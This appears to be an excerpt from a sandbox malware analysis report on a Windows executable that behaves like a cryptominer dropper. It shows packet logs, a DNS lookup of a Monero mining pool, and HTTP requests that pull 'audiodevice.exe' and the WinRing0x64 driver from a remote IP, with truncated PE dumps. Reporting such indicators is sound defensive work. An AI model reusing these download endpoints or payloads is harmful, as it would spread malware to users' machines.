                              Aug 5, 2024 14:40:51.692789078 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.692795992 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.692806959 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.692816973 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.692820072 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.692828894 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.692846060 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.692871094 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.693255901 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.693267107 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.693276882 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.693289042 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.693300962 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.693309069 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.693329096 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.693351030 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.735265017 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.735282898 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.735302925 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.735316038 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.735327005 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.735340118 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.735367060 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.735440969 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.735450029 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.735461950 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.735521078 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.742923975 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.796591043 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.796658039 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.796691895 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.796740055 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.796778917 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.796814919 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.796847105 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.796879053 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.796895027 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.796895027 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.796895027 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.796917915 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.796953917 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.796968937 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.797152042 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.797184944 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.797214031 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.797218084 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.797251940 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.797255993 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.797290087 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.797312021 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.797347069 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.797379971 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.797429085 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.797435045 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.797463894 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.797497034 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.797739983 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.797772884 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.797801971 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.797806025 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.797846079 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.797888041 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.797899008 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.797921896 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.797945023 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.797954082 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.797986031 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.798018932 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.798046112 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.798049927 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.798083067 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.798085928 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.798119068 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.798151016 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.798182011 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.798182964 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.798214912 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.798217058 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.798270941 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.798551083 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.798587084 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.798619986 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.798672915 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.798677921 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.798727989 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.798732042 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.798759937 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.798793077 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.798824072 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.798850060 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.798856974 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.798888922 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.798888922 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.798921108 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.798940897 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.798954010 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.798986912 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.799017906 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.799050093 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.799051046 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.799082041 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.799091101 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.799117088 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.799138069 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.799552917 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.799606085 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.799616098 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.799635887 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.799668074 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.799702883 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.799725056 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.799736977 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.799760103 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.799770117 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.799802065 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.799834013 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.799854994 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.799866915 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.799896002 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.799899101 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.799932003 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.799962997 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.799988031 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.799994946 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.800024033 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.800029039 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.800061941 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.800096989 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.800124884 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.800131083 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.800158978 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.800163984 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.800265074 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.800323963 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.800442934 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.800523996 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.800546885 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.800585032 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.800616980 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.800648928 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.800673008 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.800681114 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.800709009 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.800713062 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.800745010 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.800777912 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.800801039 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.800811052 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.800842047 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.800848007 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.800880909 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.800915003 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.800937891 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.800946951 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.800973892 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.800983906 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.801019907 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.801052094 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.801078081 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.801116943 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.801419973 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.801453114 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.801485062 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.801522970 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.801541090 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.801557064 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.801577091 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.801589012 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.801623106 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.801655054 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.801676989 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.801687002 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.801724911 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.801729918 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.801759005 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.801791906 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.801826954 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.801815987 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.801851034 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.823896885 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.824028015 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.824060917 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.824095011 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.824229956 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.824279070 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.824311972 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.824345112 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.824358940 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.824378967 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.824430943 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.871074915 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.885224104 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.885263920 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.885339022 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.885421991 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.885476112 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.885530949 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.885534048 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.885565042 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.885653973 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.885673046 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.885725021 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.885757923 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.885796070 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.885802031 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.885831118 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.885862112 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.885868073 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.885924101 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.885938883 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.885972023 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.886003971 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.886042118 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.886061907 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.886075020 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.886106968 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.886109114 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.886142969 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.886200905 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.886293888 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.886348009 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.886518955 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.886552095 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.886584997 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.886620045 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.886652946 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.886677980 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.886684895 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.886718035 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.886749029 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.886749983 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.886782885 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.886840105 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.887048006 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.887083054 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.887106895 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.887116909 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.887155056 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.887188911 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.887208939 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.887221098 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.887243032 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:51.887254000 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.887285948 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.887317896 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:51.887337923 CEST497211111192.168.2.6172.86.76.134

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Aug 5, 2024 14:41:03.223618031 CEST192.168.2.61.1.1.10x4a14Standard query (0)xmr-us-east1.nanopool.orgA (IP address)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Aug 5, 2024 14:41:03.235004902 CEST1.1.1.1192.168.2.60x4a14No error (0)xmr-us-east1.nanopool.org51.222.106.253A (IP address)IN (0x0001)false
                              Aug 5, 2024 14:41:03.235004902 CEST1.1.1.1192.168.2.60x4a14No error (0)xmr-us-east1.nanopool.org51.222.200.133A (IP address)IN (0x0001)false
                              Aug 5, 2024 14:41:03.235004902 CEST1.1.1.1192.168.2.60x4a14No error (0)xmr-us-east1.nanopool.org51.79.71.77A (IP address)IN (0x0001)false
                              Aug 5, 2024 14:41:03.235004902 CEST1.1.1.1192.168.2.60x4a14No error (0)xmr-us-east1.nanopool.org51.222.12.201A (IP address)IN (0x0001)false

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.649721172.86.76.13411115232C:\Users\user\Desktop\4LX9x1PMAW.exe
                              TimestampBytes transferredDirectionData
                              Aug 5, 2024 14:40:47.997586966 CEST68OUTGET /audiodevice HTTP/1.1
                              accept: */*
                              host: 172.86.76.134:1111
                              Aug 5, 2024 14:40:48.626929998 CEST1236INHTTP/1.1 200 OK
                              Content-Disposition: attachment; filename="audiodevice.exe"
                              access-control-allow-origin: *
                              transfer-encoding: chunked
                              connection: keep-alive
                              content-type: application/x-msdos-program
                              Data Raw: 31 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 45 dd 95 fd 01 bc fb ae 01 bc fb ae 01 bc fb ae 4a c4 f8 af 06 bc fb ae 4a c4 fe af cb bc fb ae 01 bc fb ae 00 bc fb ae c3 3d 06 ae 05 bc fb ae c3 3d ff af 12 bc fb ae c3 3d f8 af 13 bc fb ae c3 3d fe af 60 bc fb ae 4a c4 ff af 17 bc fb ae f2 3e ff af 13 bc fb ae 01 bc fa ae 74 bd fb ae 4a c4 fa af 14 bc fb ae c2 c9 ff af 52 be fb ae f2 3e f2 af 06 bd fb ae f2 3e f8 af 02 bc fb ae f2 3e 04 ae 00 bc fb ae 01 bc 6c ae 00 bc fb ae f2 3e f9 af 00 bc fb ae 52 69 63 68 01 bc fb ae 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 10 00 c9 24 a9 66 00 00 00 00 00 00 00 00 [TRUNCATED]
                              Data Ascii: 1000MZ@8!L!This program cannot be run in DOS mode.$EJJ====`J>tJR>>>l>RichPEd$f"'7DXp@J 6a||h+@p|( X7R ` C8X@@ *`NF"@ `y(\"@@ V`{#@` &p{#@` {#@` {#@@ h{#@@ {d#@B.idata`|$ [TRUNCATED]


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.649722172.86.76.13411115232C:\Users\user\Desktop\4LX9x1PMAW.exe
                              TimestampBytes transferredDirectionData
                              Aug 5, 2024 14:40:52.743518114 CEST64OUTGET /winring HTTP/1.1
                              accept: */*
                              host: 172.86.76.134:1111
                              Aug 5, 2024 14:40:53.383088112 CEST1236INHTTP/1.1 200 OK
                              Content-Disposition: attachment; filename="WinRing0x64.sys"
                              access-control-allow-origin: *
                              transfer-encoding: chunked
                              connection: keep-alive
                              content-type: text/plain
                              Data Raw: 31 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 35 3a 6e fc 71 5b 00 af 71 5b 00 af 71 5b 00 af 71 5b 01 af 7d 5b 00 af 56 9d 7b af 74 5b 00 af 56 9d 7d af 70 5b 00 af 56 9d 6d af 72 5b 00 af 56 9d 71 af 70 5b 00 af 56 9d 7c af 70 5b 00 af 56 9d 78 af 70 5b 00 af 52 69 63 68 71 5b 00 af 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 c1 26 8b 48 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 0c 00 00 00 0a 00 00 00 00 00 00 08 50 00 00 00 10 00 00 00 00 01 00 00 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 06 00 00 00 00 00 00 00 00 70 00 00 00 04 00 00 08 19 01 00 01 00 00 00 00 00 04 00 00 00 00 00 00 10 00 00 [TRUNCATED]
                              Data Ascii: 1000MZ@!L!This program cannot be run in DOS mode.$5:nq[q[q[q[}[V{t[V}p[Vmr[Vqp[V|p[Vxp[Richq[PEd&H"PpdP<`@`p p.text h.rdata| @H.data0@.pdata`@@HINIT"P .rsrc`@B [TRUNCATED]


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.649723172.86.76.13411115232C:\Users\user\Desktop\4LX9x1PMAW.exe
                              TimestampBytes transferredDirectionData
                              Aug 5, 2024 14:40:53.747411013 CEST63OUTGET /svhost HTTP/1.1
                              accept: */*
                              host: 172.86.76.134:1111
                              Aug 5, 2024 14:40:54.368534088 CEST1236INHTTP/1.1 200 OK
                              Content-Disposition: attachment; filename="audiodevice.exe"
                              access-control-allow-origin: *
                              transfer-encoding: chunked
                              connection: keep-alive
                              content-type: application/x-msdos-program
                              Data Raw: 31 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b9 84 54 fc fd e5 3a af fd e5 3a af fd e5 3a af f4 9d a9 af ed e5 3a af 3f 64 3f ae d5 e5 3a af 3f 64 3e ae f0 e5 3a af 3f 64 39 ae ef e5 3a af 39 90 3b ae df e5 3a af b6 9d 3b ae fe e5 3a af fd e5 3b af 9c e4 3a af 0e 67 3e ae fc e5 3a af fd e5 3a af f0 e4 3a af 0e 67 c5 af fc e5 3a af 0e 67 38 ae fc e5 3a af 52 69 63 68 fd e5 3a af 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 15 41 a9 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 27 00 aa 20 00 00 a0 16 00 00 00 00 00 64 9e 1f 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 [TRUNCATED]
                              Data Ascii: 1000MZ@!L!This program cannot be run in DOS mode.$T::::?d?:?d>:?d9:9;:;:;:g>:::g:g8:Rich:PEdAf"' d@7`1 705@078P`**( *@ .text` `.rdata` @@.datay1F1@.pdata@051@@_RDATA73@@.rsrc 73@@.reloc8P07R3@B [TRUNCATED]


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:08:39:02
                              Start date:05/08/2024
                              Path:C:\Users\user\Desktop\4LX9x1PMAW.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Users\user\Desktop\4LX9x1PMAW.exe"
                              Imagebase:0x7ff6a73a0000
                              File size:3'414'528 bytes
                              MD5 hash:E211B2B230EF040FE40BC380899990FC
                              Has elevated privileges:true
